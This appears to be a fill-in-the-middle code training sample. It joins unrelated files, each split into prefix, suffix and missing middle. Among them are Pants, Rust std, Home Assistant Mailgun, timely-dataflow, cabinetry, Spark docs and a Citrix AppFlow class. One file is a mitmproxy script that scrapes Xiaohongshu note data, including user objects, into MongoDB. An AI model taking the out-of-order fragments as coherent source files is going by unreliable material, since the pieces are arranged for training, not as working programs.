<TextArea rows={24} onChange={v => this.onChange(v)}/>
</Modal>
);
}
}
export default SubmitModal; |
const TextArea = Input.TextArea; |
ivy_imports.py | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.jvm.tasks.ivy_task_mixin import IvyTaskMixin
from pants.backend.jvm.tasks.nailgun_task import NailgunTask
class IvyImports(IvyTaskMixin, NailgunTask):
"""Resolves a jar of .proto files for each target in the context which has imports (ie, for each
JavaProtobufLibrary target).
"""
_CONFIG_SECTION = 'ivy-imports'
# TODO https://github.com/pantsbuild/pants/issues/604 product_types start
@classmethod
def product_types(cls):
return ['ivy_imports']
# TODO https://github.com/pantsbuild/pants/issues/604 product_types finish
@classmethod
def prepare(cls, options, round_manager):
super(IvyImports, cls).prepare(options, round_manager)
round_manager.require_data('jvm_build_tools_classpath_callbacks')
@property
def config_section(self):
return self._CONFIG_SECTION
def _str_jar(self, jar):
return 'jar' + str((jar.org, jar.name, jar.rev))
def | (self):
def nice_target_name(t):
return t.address.spec
resolve_for = self.context.targets(lambda t: t.has_label('has_imports'))
if resolve_for:
imports_map = self.context.products.get('ivy_imports')
executor = self.create_java_executor()
for target in resolve_for:
jars = target.imports
self.context.log.info('Mapping import jars for {target}: \n {jars}'.format(
target=nice_target_name(target),
jars='\n '.join(self._str_jar(s) for s in jars)))
self.mapjars(imports_map, target, executor, jars=jars)
| execute |
mod.rs | //! Platform-independent platform abstraction
//!
//! This is the platform-independent portion of the standard library's
//! platform abstraction layer, whereas `std::sys` is the
//! platform-specific portion.
//!
//! The relationship between `std::sys_common`, `std::sys` and the
//! rest of `std` is complex, with dependencies going in all
//! directions: `std` depending on `sys_common`, `sys_common`
//! depending on `sys`, and `sys` depending on `sys_common` and `std`.
//! This is because `sys_common` not only contains platform-independent code,
//! but also code that is shared between the different platforms in `sys`.
//! Ideally all that shared code should be moved to `sys::common`,
//! and the dependencies between `std`, `sys_common` and `sys` all would form a dag.
//! Progress on this is tracked in #84187.
#![allow(missing_docs)]
#![allow(missing_debug_implementations)]
#[cfg(test)]
mod tests;
pub mod backtrace;
pub mod condvar;
pub mod fs;
pub mod io;
pub mod memchr;
pub mod mutex;
pub mod process;
pub mod remutex;
pub mod rwlock;
pub mod thread;
pub mod thread_info;
pub mod thread_local_dtor;
pub mod thread_local_key;
pub mod thread_parker;
pub mod wtf8;
cfg_if::cfg_if! {
if #[cfg(any(target_os = "l4re",
target_os = "hermit",
target_os = "xous",
feature = "restricted-std",
all(target_family = "wasm", not(target_os = "emscripten")),
all(target_vendor = "fortanix", target_env = "sgx")))] {
pub use crate::sys::net;
} else {
pub mod net;
}
}
// common error constructors
/// A trait for viewing representations from std types
#[doc(hidden)]
pub trait AsInner<Inner: ?Sized> {
fn as_inner(&self) -> &Inner;
}
/// A trait for viewing representations from std types
#[doc(hidden)]
pub trait AsInnerMut<Inner: ?Sized> {
fn as_inner_mut(&mut self) -> &mut Inner;
}
/// A trait for extracting representations from std types
#[doc(hidden)]
pub trait IntoInner<Inner> {
fn into_inner(self) -> Inner;
}
/// A trait for creating std types from internal representations
#[doc(hidden)]
pub trait FromInner<Inner> {
fn from_inner(inner: Inner) -> Self;
}
// Computes (value*numer)/denom without overflow, as long as both
// (numer*denom) and the overall result fit into i64 (which is the case
// for our time conversions). | let q = value / denom;
let r = value % denom;
// Decompose value as (value/denom*denom + value%denom),
// substitute into (value*numer)/denom and simplify.
// r < denom, so (denom*numer) is the upper bound of (r*numer)
q * numer + r * numer / denom
} | #[allow(dead_code)] // not used on all platforms
pub fn mul_div_u64(value: u64, numer: u64, denom: u64) -> u64 { |
__init__.py | """Support for Mailgun."""
import hashlib
import hmac
import json
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.const import CONF_API_KEY, CONF_DOMAIN, CONF_WEBHOOK_ID
from homeassistant.helpers import config_entry_flow
from .const import DOMAIN
_LOGGER = logging.getLogger(__name__)
CONF_SANDBOX = 'sandbox'
DEFAULT_SANDBOX = False
MESSAGE_RECEIVED = '{}_message_received'.format(DOMAIN)
CONFIG_SCHEMA = vol.Schema({
vol.Optional(DOMAIN): vol.Schema({
vol.Required(CONF_API_KEY): cv.string,
vol.Required(CONF_DOMAIN): cv.string,
vol.Optional(CONF_SANDBOX, default=DEFAULT_SANDBOX): cv.boolean,
}),
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass, config):
"""Set up the Mailgun component."""
if DOMAIN not in config:
return True
hass.data[DOMAIN] = config[DOMAIN]
return True
async def handle_webhook(hass, webhook_id, request):
|
async def verify_webhook(hass, token=None, timestamp=None, signature=None):
"""Verify webhook was signed by Mailgun."""
if DOMAIN not in hass.data:
_LOGGER.warning('Cannot validate Mailgun webhook, missing API Key')
return True
if not (token and timestamp and signature):
return False
hmac_digest = hmac.new(
key=bytes(hass.data[DOMAIN][CONF_API_KEY], 'utf-8'),
msg=bytes('{}{}'.format(timestamp, token), 'utf-8'),
digestmod=hashlib.sha256
).hexdigest()
return hmac.compare_digest(signature, hmac_digest)
async def async_setup_entry(hass, entry):
"""Configure based on config entry."""
hass.components.webhook.async_register(
DOMAIN, 'Mailgun', entry.data[CONF_WEBHOOK_ID], handle_webhook)
return True
async def async_unload_entry(hass, entry):
"""Unload a config entry."""
hass.components.webhook.async_unregister(entry.data[CONF_WEBHOOK_ID])
return True
# pylint: disable=invalid-name
async_remove_entry = config_entry_flow.webhook_async_remove_entry
| """Handle incoming webhook with Mailgun inbound messages."""
body = await request.text()
try:
data = json.loads(body) if body else {}
except ValueError:
return None
if isinstance(data, dict) and 'signature' in data.keys():
if await verify_webhook(hass, **data['signature']):
data['webhook_id'] = webhook_id
hass.bus.async_fire(MESSAGE_RECEIVED, data)
return
_LOGGER.warning(
'Mailgun webhook received an unauthenticated message - webhook_id: %s',
webhook_id
) |
broadcast.rs | //! Broadcast records to all workers.
use communication::Pull;
use ::ExchangeData;
use progress::nested::subgraph::{Source, Target};
use dataflow::{Stream, Scope};
use progress::ChangeBatch;
use progress::{Timestamp, Operate, Antichain};
use dataflow::channels::{Message, Bundle};
use dataflow::channels::pushers::Counter as PushCounter;
use dataflow::channels::pushers::buffer::Buffer as PushBuffer;
use dataflow::channels::pushers::Tee;
use dataflow::channels::pullers::Counter as PullCounter;
use dataflow::channels::pact::{LogPusher, LogPuller};
/// Broadcast records to all workers.
pub trait Broadcast<D: ExchangeData> {
/// Broadcast records to all workers.
///
/// # Examples
/// ```
/// use timely::dataflow::operators::{ToStream, Broadcast, Inspect};
///
/// timely::example(|scope| {
/// (0..10).to_stream(scope)
/// .broadcast()
/// .inspect(|x| println!("seen: {:?}", x));
/// });
/// ```
fn broadcast(&self) -> Self;
}
impl<G: Scope, D: ExchangeData> Broadcast<D> for Stream<G, D> {
fn broadcast(&self) -> Stream<G, D> {
let mut scope = self.scope();
let channel_id = scope.new_identifier();
let (pushers, puller) = scope.allocate::<Message<G::Timestamp, D>>(channel_id);
let (targets, registrar) = Tee::<G::Timestamp, D>::new();
assert_eq!(pushers.len(), scope.peers());
let receiver = LogPuller::new(puller, scope.index(), channel_id, scope.logging());
let operator = BroadcastOperator {
index: scope.index(),
peers: scope.peers(),
input: PullCounter::new(receiver),
output: PushBuffer::new(PushCounter::new(targets)),
};
let operator_index = scope.add_operator(Box::new(operator));
for (i, pusher) in pushers.into_iter().enumerate() {
let sender = LogPusher::new(pusher, scope.index(), i, channel_id, scope.logging());
self.connect_to(Target { index: operator_index, port: i }, sender, channel_id);
}
Stream::new(Source { index: operator_index, port: 0 }, registrar, scope)
}
}
struct BroadcastOperator<T: Timestamp, D: ExchangeData> {
index: usize,
peers: usize,
input: PullCounter<T, D, LogPuller<T, D, Box<Pull<Bundle<T, D>>>>>,
output: PushBuffer<T, D, PushCounter<T, D, Tee<T, D>>>,
}
impl<T: Timestamp, D: ExchangeData> Operate<T> for BroadcastOperator<T, D> {
fn | (&self) -> String { "Broadcast".to_owned() }
fn inputs(&self) -> usize { self.peers }
fn outputs(&self) -> usize { 1 }
fn get_internal_summary(&mut self) -> (Vec<Vec<Antichain<T::Summary>>>, Vec<ChangeBatch<T>>) {
// TODO: (optimization) some of these internal paths do not actually exist
let summary = (0..self.peers).map(|_| vec![Antichain::from_elem(Default::default())]).collect::<Vec<_>>();
(summary, vec![ChangeBatch::new()])
}
fn pull_internal_progress(&mut self, consumed: &mut [ChangeBatch<T>],
_internal: &mut [ChangeBatch<T>],
produced: &mut [ChangeBatch<T>]) -> bool {
let mut vec = Vec::new();
while let Some(bundle) = self.input.next() {
use communication::message::RefOrMut;
match bundle.as_ref_or_mut() {
RefOrMut::Ref(bundle) => {
RefOrMut::Ref(&bundle.data).swap(&mut vec);
self.output.session(&bundle.time).give_vec(&mut vec);
},
RefOrMut::Mut(bundle) => {
self.output.session(&bundle.time).give_vec(&mut bundle.data);
},
}
}
self.output.cease();
self.input.consumed().borrow_mut().drain_into(&mut consumed[self.index]);
self.output.inner().produced().borrow_mut().drain_into(&mut produced[0]);
false
}
fn notify_me(&self) -> bool { false }
}
| name |
main.rs | // Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
// SPDX-License-Identifier: Apache-2.0 OR MIT
#![feature(core_intrinsics)]
use std::intrinsics::{
atomic_or, atomic_or_acq, atomic_or_acqrel, atomic_or_rel, atomic_or_relaxed,
};
fn main() | {
let mut a1 = 1 as u8;
let mut a2 = 1 as u8;
let mut a3 = 1 as u8;
let mut a4 = 1 as u8;
let mut a5 = 1 as u8;
let ptr_a1: *mut u8 = &mut a1;
let ptr_a2: *mut u8 = &mut a2;
let ptr_a3: *mut u8 = &mut a3;
let ptr_a4: *mut u8 = &mut a4;
let ptr_a5: *mut u8 = &mut a5;
let b = 0 as u8;
let c = 1 as u8;
unsafe {
let x1 = atomic_or(ptr_a1, b);
let x2 = atomic_or_acq(ptr_a2, b);
let x3 = atomic_or_acqrel(ptr_a3, b);
let x4 = atomic_or_rel(ptr_a4, b);
let x5 = atomic_or_relaxed(ptr_a5, b);
assert!(x1 == 1);
assert!(x2 == 1);
assert!(x3 == 1);
assert!(x4 == 1);
assert!(x5 == 1);
assert!(*ptr_a1 == c);
assert!(*ptr_a2 == c);
assert!(*ptr_a3 == c);
assert!(*ptr_a4 == c);
assert!(*ptr_a5 == c);
}
} |
|
__init__.py | from .conf import Configuration, parse_config, read_config
from .model import OpenAmundsen, Model
from . import constants, errors, terrain
# Get version (method as used by matplotlib: https://github.com/matplotlib/matplotlib/blob/bcc1ce8461f5b6e874baaaa02ef776d0243a4abe/lib/matplotlib/__init__.py#L133-L151)
def __getattr__(name):
if name == '__version__':
from pathlib import Path
import setuptools_scm
global __version__
root = Path(__file__).resolve().parents[1]
if (root / '.git').exists() and not (root / '.git/shallow').exists():
__version__ = setuptools_scm.get_version(
root=root,
version_scheme='post-release',
fallback_version='0.0.0+UNKNOWN',
)
else:
|
return __version__
raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
__all__ = [
'OpenAmundsen',
'Configuration',
'parse_config',
'read_config',
]
| try:
from . import _version
__version__ = _version.version
except ImportError:
__version__ = '0.0.0+UNKNOWN' |
test_templates.py | import logging
import pathlib
from unittest import mock
from cabinetry import templates
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.builder._Builder")
def test_build(mock_builder, mock_apply):
config = {"General": {"HistogramFolder": "path/", "InputPath": "file.root"}}
method = "uproot"
# no router
templates.build(config, method=method)
assert mock_builder.call_args_list == [
((pathlib.Path("path/"), "file.root", method), {})
]
assert mock_apply.call_count == 1
config_call, func_call = mock_apply.call_args[0]
assert config_call == config
assert func_call._extract_mock_name() == "_Builder()._create_histogram"
assert mock_apply.call_args[1] == {"match_func": None}
# including a router
mock_router = mock.MagicMock()
templates.build(config, method=method, router=mock_router)
# verify wrapper was set
assert (
mock_router.template_builder_wrapper._extract_mock_name()
== "_Builder()._wrap_custom_template_builder"
) | assert func_call._extract_mock_name() == "_Builder()._create_histogram"
assert mock_apply.call_args[1] == {
"match_func": mock_router._find_template_builder_match
}
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.collector._collector", return_value="func")
def test_collect(mock_collector, mock_apply, caplog):
caplog.set_level(logging.DEBUG)
config = {
"General": {
"HistogramFolder": "path/",
"InputPath": "f.root:{VariationPath}",
"VariationPath": "nominal",
}
}
method = "uproot"
templates.collect(config, method=method)
assert mock_collector.call_args_list == [
((pathlib.Path("path/"), "f.root:{VariationPath}", "nominal", method), {})
]
assert mock_apply.call_args_list == [((config, "func"), {})]
caplog.clear()
# no VariationPath in general settings
config = {
"General": {"HistogramFolder": "path/", "InputPath": "f.root:{VariationPath}"}
}
templates.collect(config, method=method)
assert 'no VariationPath specified in general settings, defaulting to ""' in [
rec.message for rec in caplog.records
]
assert mock_collector.call_args == (
(pathlib.Path("path/"), "f.root:{VariationPath}", "", method),
{},
)
caplog.set_level(logging.DEBUG)
@mock.patch("cabinetry.route.apply_to_all_templates")
@mock.patch("cabinetry.templates.postprocessor._postprocessor", return_value="func")
def test_run(mock_postprocessor, mock_apply):
config = {"General": {"HistogramFolder": "path/"}}
templates.postprocess(config)
assert mock_postprocessor.call_args_list == [((pathlib.Path("path/"),), {})]
assert mock_apply.call_args_list == [((config, "func"), {})] |
assert mock_apply.call_count == 2 # 1 from before
config_call, func_call = mock_apply.call_args[0]
assert config_call == config |
main.js | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/* Custom JavaScript code in the MarkDown docs */
// Enable language-specific code tabs
function | () {
var counter = 0;
var langImages = {
"scala": "img/scala-sm.png",
"python": "img/python-sm.png",
"java": "img/java-sm.png"
};
$("div.codetabs").each(function () {
$(this).addClass("tab-content");
// Insert the tab bar
var tabBar = $('<ul class="nav nav-tabs" data-tabs="tabs"></ul>');
$(this).before(tabBar);
// Add each code sample to the tab bar:
var codeSamples = $(this).children("div");
codeSamples.each(function () {
$(this).addClass("tab-pane");
var lang = $(this).data("lang");
var image = $(this).data("image");
var label = $(this).data("label");
var notabs = $(this).data("notabs");
if (label == null) {
var capitalizedLang = lang.substr(0, 1).toUpperCase() + lang.substr(1);
label = capitalizedLang;
}
lang = lang.replace(/ /g, '');
var id = "tab_" + label.replace(/ /g, '_') + "_" + counter;
$(this).attr("id", id);
if (image != null && langImages[lang]) {
var buttonLabel = "<img src='" + langImages[lang] + "' alt='" + label + "' />";
} else if (notabs == null) {
var buttonLabel = "<b>" + label + "</b>";
} else {
var buttonLabel = ""
}
tabBar.append(
'<li><a href="#' + id + '">' + buttonLabel + '</a></li>'
);
});
codeSamples.first().addClass("active");
tabBar.children("li").first().addClass("active");
counter++;
});
$("ul.nav-tabs a").click(function (e) {
// Toggling a tab should switch all tabs corresponding to the same language
// while retaining the scroll position
e.preventDefault();
var scrollOffset = $(this).offset().top - $(document).scrollTop();
$(this).tab('show');
$(document).scrollTop($(this).offset().top - scrollOffset);
});
$("table").each(function () {
$(this).addClass("table table-bordered");
});
}
// A script to fix internal hash links because we have an overlapping top bar.
// Based on https://github.com/twitter/bootstrap/issues/193#issuecomment-2281510
function maybeScrollToHash() {
if (window.location.hash && $(window.location.hash).length) {
var newTop = $(window.location.hash).offset().top - 57;
$(window).scrollTop(newTop);
}
}
$(function () {
codeTabs();
// Display anchor links when hovering over headers. For documentation of the
// configuration options, see the AnchorJS documentation.
anchors.options = {
placement: 'left'
};
anchors.add();
$(window).bind('hashchange', function () {
maybeScrollToHash();
});
// Scroll now too in case we had opened the page on a hash, but wait a bit because some browsers
// will try to do *their* initial scroll after running the onReady handler.
$(window).load(function () {
setTimeout(function () {
maybeScrollToHash();
}, 25);
});
});
| codeTabs |
xhs_wechat_noteid_script.py | import json
import pymongo
from config import *
def | (flow):
global collection
client = pymongo.MongoClient(MONGO_URL)
db = client[WECHAT_XHS_MONGO_DB]
collection = db[WECHAT_XHS_NOTE_MONGO_COLLECTION]
url1 = 'https://www.xiaohongshu.com/sapi/wx_mp_api/sns/v1/search/notes?'
url2 = 'https://www.xiaohongshu.com/fe_api/burdock/v1/page/'
if flow.request.url.startswith(url1):
# 数据的解析
print(flow.request.url)
notes = json.loads(flow.response.text)["data"]["notes"]
for note in notes:
note_id = note["id"]
img_list = note["images_list"]
title = note["title"]
user = note["user"]
content = {
"note_id": note_id,
"img_list": img_list,
"title": title,
"user":user
}
collection.insert(content)
elif flow.request.url.startswith(url2):
print(flow.request.url)
notes = json.loads(flow.response.text)["data"]
for note in notes:
note_id = note["id"]
img_list = note["cover"]
title = note["title"]
user = note["user"]
content = {
"note_id": note_id,
"img_list": img_list,
"title": title,
"user": user
}
collection.insert(content)
| response |
index.js | "use strict"; | exports.__esModule = true;
var tslib_1 = require("tslib");
tslib_1.__exportStar(require("../__internal__/cjs-src/icons/IconTie/IconTie"), exports); |
|
appflowparam.py | #
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class appflowparam(base_resource) :
""" Configuration for AppFlow parameter resource. """
def __init__(self) :
self._templaterefresh = None
self._appnamerefresh = None
self._flowrecordinterval = None
self._securityinsightrecordinterval = None
self._udppmtu = None
self._httpurl = None
self._aaausername = None
self._httpcookie = None
self._httpreferer = None
self._httpmethod = None
self._httphost = None
self._httpuseragent = None
self._clienttrafficonly = None
self._httpcontenttype = None
self._httpauthorization = None
self._httpvia = None
self._httpxforwardedfor = None
self._httplocation = None
self._httpsetcookie = None
self._httpsetcookie2 = None
self._connectionchaining = None
self._httpdomain = None
self._skipcacheredirectionhttptransaction = None
self._identifiername = None
self._identifiersessionname = None
self._observationdomainid = None
self._observationdomainname = None
self._subscriberawareness = None
self._subscriberidobfuscation = None
self._subscriberidobfuscationalgo = None
self._gxsessionreporting = None
self._securityinsighttraffic = None
self._cacheinsight = None
self._videoinsight = None
self._httpquerywithurl = None
self._urlcategory = None
self._lsnlogging = None
self._cqareporting = None
self._emailaddress = None
self._usagerecordinterval = None
self._websaasappusagereporting = None
self._metrics = None
self._events = None
self._auditlogs = None
self._observationpointid = None
self._distributedtracing = None
self._disttracingsamplingrate = None
self._tcpattackcounterinterval = None
self._logstreamovernsip = None
self._analyticsauthtoken = None
self._timeseriesovernsip = None
self._builtin = None
self._feature = None
self._tcpburstreporting = None
self._tcpburstreportingthreshold = None
@property
def templaterefresh(self) :
r"""Refresh interval, in seconds, at which to export the template data. Because data transmission is in UDP, the templates must be resent at regular intervals.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._templaterefresh
except Exception as e:
raise e
@templaterefresh.setter
def templaterefresh(self, templaterefresh) :
r"""Refresh interval, in seconds, at which to export the template data. Because data transmission is in UDP, the templates must be resent at regular intervals.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._templaterefresh = templaterefresh
except Exception as e:
raise e
@property
def appnamerefresh(self) :
r"""Interval, in seconds, at which to send Appnames to the configured collectors. Appname refers to the name of an entity (virtual server, service, or service group) in the Citrix ADC.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._appnamerefresh
except Exception as e:
raise e
@appnamerefresh.setter
def appnamerefresh(self, appnamerefresh) :
r"""Interval, in seconds, at which to send Appnames to the configured collectors. Appname refers to the name of an entity (virtual server, service, or service group) in the Citrix ADC.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._appnamerefresh = appnamerefresh
except Exception as e:
raise e
@property
def flowrecordinterval(self) :
r"""Interval, in seconds, at which to send flow records to the configured collectors.<br/>Default value: 60<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._flowrecordinterval
except Exception as e:
raise e
@flowrecordinterval.setter
def flowrecordinterval(self, flowrecordinterval) :
r"""Interval, in seconds, at which to send flow records to the configured collectors.<br/>Default value: 60<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._flowrecordinterval = flowrecordinterval
except Exception as e:
raise e
@property
def securityinsightrecordinterval(self) :
r"""Interval, in seconds, at which to send security insight flow records to the configured collectors.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600.
"""
try :
return self._securityinsightrecordinterval
except Exception as e:
raise e
@securityinsightrecordinterval.setter
def securityinsightrecordinterval(self, securityinsightrecordinterval) :
r"""Interval, in seconds, at which to send security insight flow records to the configured collectors.<br/>Default value: 600<br/>Minimum length = 60<br/>Maximum length = 3600
"""
try :
self._securityinsightrecordinterval = securityinsightrecordinterval
except Exception as e:
raise e
@property
def udppmtu(self) :
r"""MTU, in bytes, for IPFIX UDP packets.<br/>Default value: 1472<br/>Minimum length = 128<br/>Maximum length = 1472.
"""
try :
return self._udppmtu
except Exception as e:
raise e
@udppmtu.setter
def udppmtu(self, udppmtu) :
r"""MTU, in bytes, for IPFIX UDP packets.<br/>Default value: 1472<br/>Minimum length = 128<br/>Maximum length = 1472
"""
try :
self._udppmtu = udppmtu
except Exception as e:
raise e
@property
def httpurl(self) :
r"""Include the http URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpurl
except Exception as e:
raise e
@httpurl.setter
def httpurl(self, httpurl) :
r"""Include the http URL that the Citrix ADC received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpurl = httpurl
except Exception as e:
raise e
@property
def aaausername(self) :
r"""Enable AppFlow AAA Username logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._aaausername
except Exception as e:
raise e
@aaausername.setter
def aaausername(self, aaausername) :
r"""Enable AppFlow AAA Username logging.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._aaausername = aaausername
except Exception as e:
raise e
@property
def httpcookie(self) :
r"""Include the cookie that was in the HTTP request the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpcookie
except Exception as e:
raise e
@httpcookie.setter
def httpcookie(self, httpcookie) :
r"""Include the cookie that was in the HTTP request the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpcookie = httpcookie
except Exception as e:
raise e
@property
def httpreferer(self) :
r"""Include the web page that was last visited by the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpreferer
except Exception as e:
raise e
@httpreferer.setter
def httpreferer(self, httpreferer) :
r"""Include the web page that was last visited by the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpreferer = httpreferer
except Exception as e:
raise e
@property
def httpmethod(self) :
r"""Include the method that was specified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpmethod
except Exception as e:
raise e
@httpmethod.setter
def httpmethod(self, httpmethod) :
r"""Include the method that was specified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpmethod = httpmethod
except Exception as e:
raise e
@property
def httphost(self) :
r"""Include the host identified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httphost
except Exception as e:
raise e
@httphost.setter
def httphost(self, httphost) :
r"""Include the host identified in the HTTP request that the appliance received from the client.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httphost = httphost
except Exception as e:
raise e
@property
def httpuseragent(self) :
r"""Include the client application through which the HTTP request was received by the Citrix ADC.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpuseragent
except Exception as e:
raise e
@httpuseragent.setter
def httpuseragent(self, httpuseragent) :
r"""Include the client application through which the HTTP request was received by the Citrix ADC.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpuseragent = httpuseragent
except Exception as e:
raise e
@property
def clienttrafficonly(self) :
r"""Generate AppFlow records for only the traffic from the client.<br/>Default value: NO<br/>Possible values = YES, NO.
"""
try :
return self._clienttrafficonly
except Exception as e:
raise e
@clienttrafficonly.setter
def clienttrafficonly(self, clienttrafficonly) :
r"""Generate AppFlow records for only the traffic from the client.<br/>Default value: NO<br/>Possible values = YES, NO
"""
try :
self._clienttrafficonly = clienttrafficonly
except Exception as e:
raise e
@property
def httpcontenttype(self) :
r"""Include the HTTP Content-Type header sent from the server to the client to determine the type of the content sent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpcontenttype
except Exception as e:
raise e
@httpcontenttype.setter
def httpcontenttype(self, httpcontenttype) :
r"""Include the HTTP Content-Type header sent from the server to the client to determine the type of the content sent.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpcontenttype = httpcontenttype
except Exception as e:
raise e
@property
def httpauthorization(self) :
r"""Include the HTTP Authorization header information.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpauthorization
except Exception as e:
raise e
@httpauthorization.setter
def httpauthorization(self, httpauthorization) :
r"""Include the HTTP Authorization header information.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpauthorization = httpauthorization
except Exception as e:
raise e
@property
def httpvia(self) :
r"""Include the httpVia header which contains the IP address of proxy server through which the client accessed the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpvia
except Exception as e:
raise e
@httpvia.setter
def httpvia(self, httpvia) :
r"""Include the httpVia header which contains the IP address of proxy server through which the client accessed the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpvia = httpvia
except Exception as e:
raise e
@property
def httpxforwardedfor(self) :
r"""Include the httpXForwardedFor header, which contains the original IP Address of the client using a proxy server to access the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpxforwardedfor
except Exception as e:
raise e
@httpxforwardedfor.setter
def httpxforwardedfor(self, httpxforwardedfor) :
r"""Include the httpXForwardedFor header, which contains the original IP Address of the client using a proxy server to access the server.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpxforwardedfor = httpxforwardedfor
except Exception as e:
raise e
@property
def httplocation(self) :
r"""Include the HTTP location headers returned from the HTTP responses.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httplocation
except Exception as e:
raise e
@httplocation.setter
def httplocation(self, httplocation) :
r"""Include the HTTP location headers returned from the HTTP responses.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httplocation = httplocation
except Exception as e:
raise e
@property
def httpsetcookie(self) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpsetcookie
except Exception as e:
raise e
@httpsetcookie.setter
def httpsetcookie(self, httpsetcookie) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpsetcookie = httpsetcookie
except Exception as e:
raise e
@property
def httpsetcookie2(self) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._httpsetcookie2
except Exception as e:
raise e
@httpsetcookie2.setter
def httpsetcookie2(self, httpsetcookie2) :
r"""Include the Set-cookie header sent from the server to the client in response to a HTTP request.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._httpsetcookie2 = httpsetcookie2
except Exception as e:
raise e
@property
def connectionchaining(self) :
r"""Enable connection chaining so that the client server flows of a connection are linked. Also the connection chain ID is propagated across Citrix ADCs, so that in a multi-hop environment the flows belonging to the same logical connection are linked. This id is also logged as part of appflow record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED.
"""
try :
return self._connectionchaining
except Exception as e:
raise e
@connectionchaining.setter
def connectionchaining(self, connectionchaining) :
r"""Enable connection chaining so that the client server flows of a connection are linked. Also the connection chain ID is propagated across Citrix ADCs, so that in a multi-hop environment the flows belonging to the same logical connection are linked. This id is also logged as part of appflow record.<br/>Default value: DISABLED<br/>Possible values = ENABLED, DISABLED
"""
try :
self._connectionchaining = connectionchaining
except Exception as e:
raise e
@property
def httpdomain(self) :
